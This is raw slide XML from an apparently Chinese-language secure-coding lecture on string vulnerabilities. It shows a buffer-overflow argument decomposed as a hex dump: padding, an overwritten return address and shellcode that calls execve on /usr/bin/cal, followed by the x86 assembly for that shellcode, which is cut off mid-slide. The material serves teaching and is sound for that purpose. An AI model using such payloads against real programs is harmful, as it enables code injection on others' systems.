            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4343400"/>
            <a:ext cx="7162800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11259"/>
              <a:gd name="adj2" fmla="val -78407"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>接下来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字节二进制数据将填充编译器分配的存储空间，以与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字节边界对齐</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8169870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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Mal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> Decomposed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2763838"/>
            <a:ext cx="8229600" cy="2289175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>000  31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>010  37 38 39 30 31 32 33 34 35 36 37 38 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>E0 F9 FF BF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> "789012345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>a· +"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>020  31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>030  F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ï</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>§ · +-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Ç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> · +1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>040  31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4419600"/>
            <a:ext cx="6477000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17866"/>
              <a:gd name="adj2" fmla="val -96356"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0"/>
              <a:t>这个值覆盖栈上的注入代码的返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19841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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295563" y="2132856"/>
            <a:ext cx="8658708" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>包含了终端用户和软件系统交互的大部分数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>命令行参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>环境变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>控制台输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>软件漏洞和漏洞利用是由下列字符串缺陷导致：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串表示法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2423204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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意参数的目的是把控制权转移给恶意代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可能包含在恶意参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如本实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可能在一个有效的输入操作期间注入恶意代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意代码可以执行以其他任何形式编程所能执行的功能，不过它们通常只是简单地在受害机器上开一个远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>出于这个原因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>被注入的恶意代码通常被称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1994975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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码案例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xor %eax,%eax #set eax to zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov %eax,0xbffff9ff #set to NULL word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xor %eax,%eax #set eax to zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov %eax,0xbffff9ff #set to NULL word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set code for execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> for execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
